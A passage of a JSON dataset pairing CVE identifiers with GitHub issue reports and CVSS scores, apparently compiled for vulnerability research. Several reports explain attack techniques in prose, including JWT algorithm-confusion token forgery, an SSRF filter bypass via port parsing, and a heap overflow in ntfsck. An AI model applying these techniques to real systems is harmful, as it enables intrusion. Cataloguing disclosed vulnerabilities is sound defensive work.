  78177. "description": "APITAG Server (socket.io) is possible to be accessed from socket.io client. Explanation Some time ago, there was fix for allowing only chrome extension to connect to server APITAG app), but, after researching socket.io NUMBERTAG documentation, I noticed that I can still access server by just selecting transport as websocket . It works on localhost and can be done on websites. It allows to receive and emit events to socket. Steps to reproduce Go to FILETAG Open Console You should get two things from app: Version Discord User and APITAG app should open file dialog to \"select local presence\" Code how to access socket CODETAG How to fix that? No information on it for now. I may look for fix, but I want to report it first because I respect some people here and some, I don't. I bet someone will find way to fix it before me finding a way. Regards, ririxi.",
  78178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  78179. "severity": "MEDIUM",
  78180. "baseScore": 6.5,
  78181. "impactScore": 2.5,
  78182. "exploitabilityScore": 3.9
  78183. },
  78184. {
  78185. "CVE_ID": "CVE-2021-46703",
  78186. "Issue_Url_old": "https://github.com/Antaris/RazorEngine/issues/585",
  78187. "Issue_Url_new": "https://github.com/antaris/razorengine/issues/585",
  78188. "Repo_new": "antaris/razorengine",
  78189. "Issue_Created_At": "2021-12-16T16:06:38Z",
  78190. "description": "Anouncement: Security with APITAG . This issue is to inform everyone that APITAG , which uses CAS internally, should not be considered 'secure' anymore for various reasons: CAS was obsoleted quite a while now URLTAG CAS Is not supported on latest platform updates URLTAG (.NET NUMBERTAG APITAG Core) Microsoft will no longer provide patches for security issues URLTAG In addition to the above the following code sample was reported to me as an issue of APITAG itself (thanks APITAG ERRORTAG If you depend on APITAG for security I'd urge you to redesign your security. If you need a fast fix, you can use the FILETAG and compile APITAG yourself (however, you will not longer be able to use 'dynamic' with this patch). Just to clarify, you are only affected by this IF: you currently use APITAG and use CAS to control the template permissions if users can externally control the template contents If you use APITAG for E Mail generation or templating Engine (documentation generation, ...) you are most likely not directly affected by this issue, even if you use APITAG as long as you use APITAG 'correctly'. Correct usage means that you don't allow direct user input to parts of the template. This mistake can happen if you use for example by string concatenation instead of using APITAG Syntax Elements. Just to remind you: If you use string concatenation to build your template with untrusted user inputs, you allow your users to execute code on your system. This is most likely not what you want with or without Isolation!",
  78191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78192. "severity": "CRITICAL",
  78193. "baseScore": 9.8,
  78194. "impactScore": 5.9,
  78195. "exploitabilityScore": 3.9
  78196. },
  78197. {
  78198. "CVE_ID": "CVE-2021-46743",
  78199. "Issue_Url_old": "https://github.com/firebase/php-jwt/issues/351",
  78200. "Issue_Url_new": "https://github.com/firebase/php-jwt/issues/351",
  78201. "Repo_new": "firebase/php-jwt",
  78202. "Issue_Created_At": "2021-08-04T05:17:10Z",
  78203. "description": "Possibility of Reintroducing HS NUMBERTAG RSA NUMBERTAG Type Confusion. This is a follow up to the HS NUMBERTAG RS NUMBERTAG Type Confusion attack URLTAG against the JWT protocol. Now, firebase/php jwt attempts to side step this risk by forcing the user to hard code the algorithms they wish to support. URLTAG If APITAG is an array, and APITAG contains a kid field, the key used to verify a token is determined by the kid header. URLTAG Let's say you're a service that wants to check APITAG tokens against one key type and APITAG tokens against another. Your APITAG key has APITAG , while your APITAG public key has APITAG . You might call php jwt like so: CODETAG If anyone ever sets up JWT like this: Congratulations! you've just reintroduced the critical vulnerability in your usage of the app. All you have to do is set APITAG and use the SHA NUMBERTAG hash of the RSA public key as an HMAC key, and you can mint tokens all day long. What's going on here? The fundamental problem is that the keys passed to firebase/php jwt are just strings. This flies in the face of cryptography engineering best practices: A key should always be considered to be the raw key material alongside its parameter choices URLTAG . Is this a security vulnerability? This is not a vulnerability in the firebase/php jwt library. It is, however, a very sharp edge that an unsuspecting developer could cut themselves on. Cryptography should be easy to use, hard to misuse, and secure by default. Whether the JOSE authors want to acknowledge it or not, what they published was a cryptographic protocol one that fails to live up to these tenets. It's worth noting that PASETO URLTAG mitigates this in its specification, so library authors don't have to even worry about it. The good news is: This can be easily fixed. The bad news is: It constitutes a backwards compatibility break. How to Fix This Library If you were to update the API to require keys to be a Keyring object, which maps a string APITAG ( kid ) to a APITAG object and that APITAG object had a hard coded algorithm that it could be used with then this issue would be easily avoided. Pseudocode ERRORTAG ERRORTAG ERRORTAG CODETAG ERRORTAG",
  78204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  78205. "severity": "CRITICAL",
  78206. "baseScore": 9.1,
  78207. "impactScore": 5.2,
  78208. "exploitabilityScore": 3.9
  78209. },
  78210. {
  78211. "CVE_ID": "CVE-2021-46790",
  78212. "Issue_Url_old": "https://github.com/tuxera/ntfs-3g/issues/16",
  78213. "Issue_Url_new": "https://github.com/tuxera/ntfs-3g/issues/16",
  78214. "Repo_new": "tuxera/ntfs-3g",
  78215. "Issue_Created_At": "2021-11-25T22:42:53Z",
  78216. "description": "Heap overflow in ntfsck. Hello. I have found a vulnerability in the NTFS NUMBERTAG G driver, specifically in the ntfsck tool (see: FILETAG . In the _check_file_record_ function, the update sequence array is applied, but no proper boundary checks are implemented, so the function can write bytes from the update sequence array beyond the buffer being checked. The vulnerable code is here URLTAG : usa_ofs = le NUMBERTAG to_cpu(mft_rec >usa_ofs); usa_count = le NUMBERTAG to_cpu(mft_rec >usa_count); [...] // Remove update seq & check it. usa = (u NUMBERTAG buffer+usa_ofs); // The value that should be at the end of every sector. assert_u NUMBERTAG equal(usa_count NUMBERTAG buflen/NTFS_BLOCK_SIZE, \"USA length\"); for (i NUMBERTAG i<usa_count;i++) { u NUMBERTAG fixup = (u NUMBERTAG buffer+NTFS_BLOCK_SIZE i NUMBERTAG the value at the end of the sector. u NUMBERTAG saved_val = (u NUMBERTAG buffer+usa_ofs NUMBERTAG i); // the actual data value that was saved in the us array. assert_u NUMBERTAG equal( fixup, usa, \"fixup\"); fixup = saved_val; // remove it. } If _buflen_ is NUMBERTAG but the update sequence array contains NUMBERTAG entries (including the first one, which you call _usa_), the loop will replace bytes NUMBERTAG times, at the following offsets: APITAG (within the buffer), APITAG (within the buffer), APITAG (beyond the allocated buffer size). APITAG offset of the first attribute should be set to make room for additional entries in the update sequence array, so the _usa_ofs+usa_count <= attrs_offset_ check is passed.) Thus, bytes beyond the allocated buffer can be replaced, this is a heap overflow. It should be noted that the _assert_u NUMBERTAG equal_ function just reports the errors, it doesn\u2019t terminate the execution flow. Since the _ntfsck_ tool is used in some APITAG distributions (it\u2019s APITAG in Fedora), I strongly suggest implementing a fix. Report date (to _info at tuxera dot com NUMBERTAG No reply. Ping (to _info at tuxera dot com NUMBERTAG No reply.",
  78217. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78218. "severity": "HIGH",
  78219. "baseScore": 7.8,
  78220. "impactScore": 5.9,
  78221. "exploitabilityScore": 1.8
  78222. },
  78223. {
  78224. "CVE_ID": "CVE-2022-0088",
  78225. "Issue_Url_old": "https://github.com/YOURLS/YOURLS/issues/3170",
  78226. "Issue_Url_new": "https://github.com/yourls/yourls/issues/3170",
  78227. "Repo_new": "yourls/yourls",
  78228. "Issue_Created_At": "2021-12-25T11:28:04Z",
  78229. "description": "Add nonce to the logout link. The logout link doesn't check for a nonce, see URLTAG A mean ha NUMBERTAG r can trick a naive user into logging out themselves if they're redirected to APITAG . Definitely not a big deal, but also trivial to fix.",
  78230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  78231. "severity": "HIGH",
  78232. "baseScore": 7.4,
  78233. "impactScore": 4.0,
  78234. "exploitabilityScore": 2.8
  78235. },
  78236. {
  78237. "CVE_ID": "CVE-2022-0415",
  78238. "Issue_Url_old": "https://github.com/gogs/gogs/issues/6833",
  78239. "Issue_Url_new": "https://github.com/gogs/gogs/issues/6833",
  78240. "Repo_new": "gogs/gogs",
  78241. "Issue_Created_At": "2022-03-11T15:37:36Z",
  78242. "description": "Remote command execution vulnerability in file uploading. Gogs version APITAG Git version N/A Operating system APITAG NUMBERTAG Database N/A Describe the bug A remote command execution vulnerability exists in Gogs that could allow a malicious user to execute any command on the remote server and gain the privileged user account. Here is the report on huntr.dev URLTAG To reproduce See report on huntr.dev Expected behavior See report on huntr.dev Additional context _No response_ Code of Conduct [X] I agree to follow this project's Code of Conduct",
  78243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78244. "severity": "HIGH",
  78245. "baseScore": 8.8,
  78246. "impactScore": 5.9,
  78247. "exploitabilityScore": 2.8
  78248. },
  78249. {
  78250. "CVE_ID": "CVE-2022-0534",
  78251. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/463",
  78252. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/463",
  78253. "Repo_new": "michaelrsweet/htmldoc",
  78254. "Issue_Created_At": "2022-01-07T14:45:56Z",
  78255. "description": "Stack out of bounds read in APITAG In APITAG , in FILETAG , there is a stack out of bounds read in the following code: ERRORTAG The expression APITAG , line NUMBERTAG can result in an integer overflow when APITAG , updating curbit to a large number since it is unsigned. Later on line NUMBERTAG the variable i is set to number less than APITAG , since ERRORTAG overflows, which results after a few iterations in a stack out of bounds read in APITAG . I've attached FILETAG that contains a malicious gif and a html file and triggers the out of bounds read resulting in a segmentation fault. Steps to reproduce The following should result in a segmentation fault: ERRORTAG Steps to analyse the crash on gdb CODETAG",
  78256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78257. "severity": "MEDIUM",
  78258. "baseScore": 5.5,
  78259. "impactScore": 3.6,
  78260. "exploitabilityScore": 1.8
  78261. },
  78262. {
  78263. "CVE_ID": "CVE-2022-0671",
  78264. "Issue_Url_old": "https://github.com/eclipse/lemminx/issues/1169",
  78265. "Issue_Url_new": "https://github.com/eclipse/lemminx/issues/1169",
  78266. "Repo_new": "eclipse/lemminx",
  78267. "Issue_Created_At": "2022-02-07T10:38:32Z",
  78268. "description": "Bad SYSTEM for DTD APITAG and Entity breaks the XML validation. See URLTAG",
  78269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  78270. "severity": "CRITICAL",
  78271. "baseScore": 9.1,
  78272. "impactScore": 5.2,
  78273. "exploitabilityScore": 3.9
  78274. },
  78275. {
  78276. "CVE_ID": "CVE-2022-0730",
  78277. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4562",
  78278. "Issue_Url_new": "https://github.com/cacti/cacti/issues/4562",
  78279. "Repo_new": "cacti/cacti",
  78280. "Issue_Created_At": "2022-02-21T18:07:52Z",
  78281. "description": "Under certain LDAP server environments, cacti authentication can be bypassed. Describe the bug Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. Expected behavior Cacti security model should work when Anonymous binding is enabled.",
  78282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78283. "severity": "CRITICAL",
  78284. "baseScore": 9.8,
  78285. "impactScore": 5.9,
  78286. "exploitabilityScore": 3.9
  78287. },
  78288. {
  78289. "CVE_ID": "CVE-2022-0749",
  78290. "Issue_Url_old": "https://github.com/SinGooCMS/SinGooCMSUtility/issues/1",
  78291. "Issue_Url_new": "https://github.com/singoocms/singoocmsutility/issues/1",
  78292. "Repo_new": "singoocms/singoocmsutility",
  78293. "Issue_Created_At": "2021-12-08T13:29:42Z",
  78294. "description": "Vulnerability Report\uff1a APITAG security vulnerability. Risk PATHTAG FILETAG Set up socket communication server : FILETAG client : FILETAG Constructing the payload The APITAG method internally first calls the APITAG method to read the packet header NUMBERTAG bytes) of the socket object information, and then calls the APITAG method to read the length of the bytes in the packet header (int type) The APITAG method will first intercept NUMBERTAG bytes of information, so NUMBERTAG bytes must be added before the original payload when constructing the POC. The APITAG method reads the packet header information, i.e. the NUMBERTAG bytes of information needs to contain the byte length (int type) of the original payload, while intercepting the int data type before the ' ' ending. Also the Payload source code is converted to a byte array length of NUMBERTAG bytes. A local test of the APITAG method shows that the NUMBERTAG bytes of information could be NUMBERTAG Int NUMBERTAG is the byte length of the original payload. Simulating the transmission of messages to a socket client POC implementation using a controlled data transfer from the server to the socket client, i.e. a set payload. FILETAG FILETAG FILETAG",
  78295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78296. "severity": "CRITICAL",
  78297. "baseScore": 9.8,
  78298. "impactScore": 5.9,
  78299. "exploitabilityScore": 3.9
  78300. },
  78301. {
  78302. "CVE_ID": "CVE-2022-0759",
  78303. "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/554",
  78304. "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/554",
  78305. "Repo_new": "manageiq/kubeclient",
  78306. "Issue_Created_At": "2022-03-23T10:28:21Z",
  78307. "description": "VULNERABILITY: Config defaults to APITAG when kubeconfig doesn't specify custom CA. Dangerous bug present ever since APITAG was created URLTAG : Whenever kubeconfig did not define custom CA (normal situation for production clusters with public domain and certificate!), Config was returning ssl_options[:verify_ssl] hard coded to APITAG : ( Assuming you passed those ssl_options to APITAG this means that instead of checking server's certificate against your system CA store, it would accept ANY certificate, allowing easy man in the middle attacks. This is especially dangerous with user/password or token credentials because MITM attacker could simply steal those credentials to the cluster and do anything you could do on the cluster.",
  78308. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78309. "severity": "HIGH",
  78310. "baseScore": 8.1,
  78311. "impactScore": 5.9,
  78312. "exploitabilityScore": 2.2
  78313. },
  78314. {
  78315. "CVE_ID": "CVE-2022-0759",
  78316. "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/555",
  78317. "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/555",
  78318. "Repo_new": "manageiq/kubeclient",
  78319. "Issue_Created_At": "2022-03-23T10:33:18Z",
  78320. "description": "Config ignores APITAG field. Tightly related to NUMBERTAG also broken ever since APITAG was added (I'm fixing them together): APITAG field in kubeconfig was never honored. The distinction is that NUMBERTAG is about the default being dangerous, and this ticket is about inability to override the default (either way) by APITAG .",
  78321. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78322. "severity": "HIGH",
  78323. "baseScore": 8.1,
  78324. "impactScore": 5.9,
  78325. "exploitabilityScore": 2.2
  78326. },
  78327. {
  78328. "CVE_ID": "CVE-2022-0856",
  78329. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/65",
  78330. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/65",
  78331. "Repo_new": "cacalabs/libcaca",
  78332. "Issue_Created_At": "2022-02-24T09:19:26Z",
  78333. "description": "FILETAG",
  78334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78335. "severity": "MEDIUM",
  78336. "baseScore": 6.5,
  78337. "impactScore": 3.6,
  78338. "exploitabilityScore": 2.8
  78339. },
  78340. {
  78341. "CVE_ID": "CVE-2022-0918",
  78342. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/5242",
  78343. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/5242",
  78344. "Repo_new": "389ds/389-ds-base",
  78345. "Issue_Created_At": "2022-03-30T10:56:03Z",
  78346. "description": "Craft message may crash the server. Issue Description A request containing craft parameters may crash a server Package Version and Platform: all versions Steps to Reproduce Expected results should not crash",
  78347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78348. "severity": "HIGH",
  78349. "baseScore": 7.5,
  78350. "impactScore": 3.6,
  78351. "exploitabilityScore": 3.9
  78352. },
  78353. {
  78354. "CVE_ID": "CVE-2022-0981",
  78355. "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/23269",
  78356. "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/23269",
  78357. "Repo_new": "quarkusio/quarkus",
  78358. "Issue_Created_At": "2022-01-28T14:24:04Z",
  78359. "description": "Hibernate Reactive APITAG is closed. Describe the bug This may look similar to NUMBERTAG which was fixed in APITAG ) but this time the reproducer includes a resteasy reactive request filter (see APITAG in the reproducer). Here's the exception which is thrown randomly when the app is processing concurrent requests: ERRORTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? Reproducer: URLTAG Steps to reproduce the behavior: Start the app with APITAG Run FILETAG with APITAG The exception should show up in the log eventually \u2139\ufe0f If you change the Quarkus version to APITAG , the exception should never be thrown. As a consequence, this looks like a regression to us but I'll wait for a confirmation on that specific point before tagging the issue as a regression. Output of ERRORTAG or ver Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Mon No NUMBERTAG EST NUMBERTAG APITAG Output of APITAG openjdk version APITAG NUMBERTAG LTS APITAG version (if different from Java) _No response_ Quarkus version or git rev APITAG Build tool (ie. output of APITAG or APITAG ) _No response_ Additional information _No response_",
  78360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78361. "severity": "HIGH",
  78362. "baseScore": 8.8,
  78363. "impactScore": 5.9,
  78364. "exploitabilityScore": 2.8
  78365. },
  78366. {
  78367. "CVE_ID": "CVE-2022-0982",
  78368. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/164",
  78369. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/164",
  78370. "Repo_new": "xebd/accel-ppp",
  78371. "Issue_Created_At": "2022-01-04T06:09:13Z",
  78372. "description": "Vulnerability Disclosure. Dear accel ppp Development Team, I have filed a vulnerability disclosure by email to dev APITAG APITAG Please let me know when it is patched and we can use this issue for tracking purposes. Thanks!",
  78373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78374. "severity": "CRITICAL",
  78375. "baseScore": 9.8,
  78376. "impactScore": 5.9,
  78377. "exploitabilityScore": 3.9
  78378. },
  78379. {
  78380. "CVE_ID": "CVE-2022-0991",
  78381. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/1238",
  78382. "Issue_Url_new": "https://github.com/admidio/admidio/issues/1238",
  78383. "Repo_new": "admidio/admidio",
  78384. "Issue_Created_At": "2022-03-13T08:12:47Z",
  78385. "description": "Sessions should be invalidated if password was changed. If a user will change his password (e.g. in the profile or with the password forgotten function) we should invalidate all sessions and auto login of the user. This is necessary so the user can be sure that the new password will used everywhere and a compromitted password could not be used in a saved session.",
  78386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  78387. "severity": "HIGH",
  78388. "baseScore": 7.1,
  78389. "impactScore": 4.2,
  78390. "exploitabilityScore": 2.8
  78391. },
  78392. {
  78393. "CVE_ID": "CVE-2022-1122",
  78394. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1368",
  78395. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1368",
  78396. "Repo_new": "uclouvain/openjpeg",
  78397. "Issue_Created_At": "2021-07-13T08:56:46Z",
  78398. "description": "Exist a issues of freeing uninitialized pointer in PATHTAG will cause a segfault. Hi, I found a segmentation fault in current master, and I also reproduced it on latest released version NUMBERTAG Crash Summary\uff1a A issues of freeing uninitialized pointer exist in PATHTAG in main, it can lead to a segmentation fault via the POC provided below Crash Analysis NUMBERTAG run command: ./opj_decompress APITAG input APITAG BMP NUMBERTAG If there are lots of files in the imgdir directory, that will cause memory malloc failure FILETAG NUMBERTAG Then, since the pointer dirptr >filename is not initialized, free(dirptr >filename) is failed FILETAG GDB debugging results\uff1a FILETAG FILETAG",
  78399. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78400. "severity": "MEDIUM",
  78401. "baseScore": 5.5,
  78402. "impactScore": 3.6,
  78403. "exploitabilityScore": 1.8
  78404. },
  78405. {
  78406. "CVE_ID": "CVE-2022-1209",
  78407. "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/989",
  78408. "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/989",
  78409. "Repo_new": "ultimatemember/ultimatemember",
  78410. "Issue_Created_At": "2022-04-01T12:22:47Z",
  78411. "description": "Security issues in URL and social fields. Isolating the problem (mark completed items with an x]): [x] I have deactivated other plugins and confirmed this bug occurs when only Ultimate Member plugin is active. [x] This bug happens with a default APITAG theme active, or [UM Theme URLTAG . FILETAG Image NUMBERTAG iew mode FILETAG Image NUMBERTAG Edit mode FILETAG Image NUMBERTAG iew mode FILETAG",
  78412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78413. "severity": "MEDIUM",
  78414. "baseScore": 5.4,
  78415. "impactScore": 2.7,
  78416. "exploitabilityScore": 2.3
  78417. },
  78418. {
  78419. "CVE_ID": "CVE-2022-1211",
  78420. "Issue_Url_old": "https://github.com/tildearrow/furnace/issues/325",
  78421. "Issue_Url_new": "https://github.com/tildearrow/furnace/issues/325",
  78422. "Repo_new": "tildearrow/furnace",
  78423. "Issue_Created_At": "2022-03-29T07:31:17Z",
  78424. "description": "FILETAG I use fuzz tests, so I don't analyze these crashes in detail. I packaged the POC file so you can reproduce the error.",
  78425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78426. "severity": "MEDIUM",
  78427. "baseScore": 6.5,
  78428. "impactScore": 3.6,
  78429. "exploitabilityScore": 2.8
  78430. },
  78431. {
  78432. "CVE_ID": "CVE-2022-1213",
  78433. "Issue_Url_old": "https://github.com/LiveHelperChat/livehelperchat/issues/1752",
  78434. "Issue_Url_new": "https://github.com/livehelperchat/livehelperchat/issues/1752",
  78435. "Repo_new": "livehelperchat/livehelperchat",
  78436. "Issue_Created_At": "2022-04-03T16:23:58Z",
  78437. "description": "SSRF Filter bypass port NUMBERTAG Recently, i found bypass mechanism only accept port NUMBERTAG with use multi port Beacause php parse url with port is the last of colon, and hostname is \"evil NUMBERTAG FILETAG With the code will ignore url port NUMBERTAG and use \"evil NUMBERTAG as hostname FILETAG APITAG FILETAG",
  78438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78439. "severity": "HIGH",
  78440. "baseScore": 8.1,
  78441. "impactScore": 5.2,
  78442. "exploitabilityScore": 2.8
  78443. },
  78444. {
  78445. "CVE_ID": "CVE-2022-1227",
  78446. "Issue_Url_old": "https://github.com/containers/podman/issues/10941",
  78447. "Issue_Url_new": "https://github.com/containers/podman/issues/10941",
  78448. "Repo_new": "containers/podman",
  78449. "Issue_Created_At": "2021-07-15T12:56:50Z",
  78450. "description": "podman top not work with userns=keep id container. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description Steps to reproduce the issue NUMBERTAG top with userns=keep id container ERRORTAG NUMBERTAG top with normal container CODETAG NUMBERTAG Describe the results you received: Describe the results you expected: Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : APITAG",
  78451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78452. "severity": "HIGH",
  78453. "baseScore": 8.8,
  78454. "impactScore": 5.9,
  78455. "exploitabilityScore": 2.8
  78456. },
  78457. {
  78458. "CVE_ID": "CVE-2022-1341",
  78459. "Issue_Url_old": "https://github.com/vgropp/bwm-ng/issues/26",
  78460. "Issue_Url_new": "https://github.com/vgropp/bwm-ng/issues/26",
  78461. "Repo_new": "vgropp/bwm-ng",
  78462. "Issue_Created_At": "2020-04-27T04:26:24Z",
  78463. "description": "Vulnerability? Bug? Null write in the get_cmdln_options function in src/options.c.. Hi, In src/options.c, line NUMBERTAG APITAG may fail, and str will be NULL. str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG write to Null snprintf(str,strlen(pwd_entry >pw_dir NUMBERTAG s/.bwm ng.conf\",pwd_entry >pw_dir); I think this is a vulnerability, and maybe we can patch it as following? str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG if(!str) return Thanks for any consideration! Peiyu Liu, NESA lab, Zhejiang University",
  78464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78465. "severity": "HIGH",
  78466. "baseScore": 7.5,
  78467. "impactScore": 3.6,
  78468. "exploitabilityScore": 3.9
  78469. },
  78470. {
  78471. "CVE_ID": "CVE-2022-1441",
  78472. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2175",
  78473. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2175",
  78474. "Repo_new": "gpac/gpac",
  78475. "Issue_Created_At": "2022-04-16T08:21:46Z",
  78476. "description": "GPAC NUMBERTAG APITAG stack overflow with unlimited length and controllable content in APITAG Description When GPAC tries to parse a MP4 file, it calls the function APITAG to read from video. In this funtion, it allocates a buffer str with fixed length. However, content read from bs is controllable by user, so is the length, which causes a buffer overflow. APITAG Impact Since video content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary or even get shell. Mitigation We can just set a length limit to it, making it less than NUMBERTAG byte. See pull request URLTAG . Reproduce On Ubuntu NUMBERTAG make with this. APITAG Run the following command with APITAG APITAG You may get a stack smashing detectde error, which indicates that CANARY is crashed. APITAG GDB CODETAG Credits xdchase",
  78477. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78478. "severity": "HIGH",
  78479. "baseScore": 7.8,
  78480. "impactScore": 5.9,
  78481. "exploitabilityScore": 1.8
  78482. },
  78483. {
  78484. "CVE_ID": "CVE-2022-1554",
  78485. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3128",
  78486. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3128",
  78487. "Repo_new": "clinical-genomics/scout",
  78488. "Issue_Created_At": "2022-02-02T15:47:08Z",
  78489. "description": "Fix crashes and tighten down file access for file endpoint. . When container mounts to expected fs go down, this can happen: ERRORTAG Also, it wouldn't hurt adding some checks for if the user is asking for files belonging to cases they should have access to. It would take quite some guessing of case names etc to access, but it might be possible to combine with some other situation where we feel that info is trivial to show. Also worth glitch checking. \ud83d\ude2c",
  78490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78491. "severity": "HIGH",
  78492. "baseScore": 7.5,
  78493. "impactScore": 3.6,
  78494. "exploitabilityScore": 3.9
  78495. },
  78496. {
  78497. "CVE_ID": "CVE-2022-1554",
  78498. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3302",
  78499. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3302",
  78500. "Repo_new": "clinical-genomics/scout",
  78501. "Issue_Created_At": "2022-04-19T06:22:15Z",
  78502. "description": "Refactor endpoint so that PATHTAG can't be used without being authenticated. Check the use case from this report: URLTAG Reproduce: APITAG Then `curl path as is ' URLTAG",
  78503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78504. "severity": "HIGH",
  78505. "baseScore": 7.5,
  78506. "impactScore": 3.6,
  78507. "exploitabilityScore": 3.9
  78508. },
  78509. {
  78510. "CVE_ID": "CVE-2022-1592",
  78511. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3325",
  78512. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3325",
  78513. "Repo_new": "clinical-genomics/scout",
  78514. "Issue_Created_At": "2022-05-05T05:38:38Z",
  78515. "description": "Server Side Request Forgery (SSRF) in remote_cors . We knew it was coming. Report is here: URLTAG I have no idea how to fix this vulnerability yet. Have to read about SSRF!",
  78516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
  78517. "severity": "HIGH",
  78518. "baseScore": 8.2,
  78519. "impactScore": 4.2,
  78520. "exploitabilityScore": 3.9
  78521. },
  78522. {
  78523. "CVE_ID": "CVE-2022-1706",
  78524. "Issue_Url_old": "https://github.com/coreos/ignition/issues/1300",
  78525. "Issue_Url_new": "https://github.com/coreos/ignition/issues/1300",
  78526. "Repo_new": "coreos/ignition",
  78527. "Issue_Created_At": "2022-01-11T14:00:58Z",
  78528. "description": "Security when using vmware to store the ignition config?. We thought that only root should be able to view the config but it turns out any user seems to be able so get the whole config from vmware? APITAG How can we handle secrets in ignition config? For example disk enctyption keys or other sensitivt config for systemd services we declare there?",
  78529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78530. "severity": "MEDIUM",
  78531. "baseScore": 6.5,
  78532. "impactScore": 3.6,
  78533. "exploitabilityScore": 2.8
  78534. },
  78535. {
  78536. "CVE_ID": "CVE-2022-1706",
  78537. "Issue_Url_old": "https://github.com/coreos/ignition/issues/1315",
  78538. "Issue_Url_new": "https://github.com/coreos/ignition/issues/1315",
  78539. "Repo_new": "coreos/ignition",
  78540. "Issue_Created_At": "2022-01-29T21:54:19Z",
  78541. "description": "Consider deleting userdata from provider after Ignition completes . Feature Request Environment At least GCP, APITAG APITAG Desired Feature Some platforms allow modifying or removing userdata using APIs accessible from the VM instance. On those platforms, consider deleting the Ignition config from the platform after Ignition completes. Other Information Ignition configs may contain sensitive information that should not be accessible from workloads running on the machine. We currently do nothing to help users with sensitive userdata, and there is no documentation about the issue ( URLTAG On platforms with network metadata services, the user can write an Ignition config that firewalls off the metadata service (not documented in Fedora APITAG URLTAG On platforms with in hypervisor metadata accessible by non root users (at least APITAG firewalling isn't an option, and the user must delete the metadata themselves or pursue awkward workarounds like denylisting kernel modules. Various minimalistic fixes are possible. We could publish docs on adding a 